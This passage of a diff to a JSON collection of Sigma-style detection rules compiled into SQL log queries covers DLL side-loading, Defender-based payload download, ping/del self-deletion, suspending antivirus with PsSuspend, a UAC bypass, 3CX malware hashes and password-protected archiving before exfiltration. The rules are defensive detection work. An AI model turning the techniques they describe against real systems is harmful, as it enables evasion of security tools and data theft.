ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": 